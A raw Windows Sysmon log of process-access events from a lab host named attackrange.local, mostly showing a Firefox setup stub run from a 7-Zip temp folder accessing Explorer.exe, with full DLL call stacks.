13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.130{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.130{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 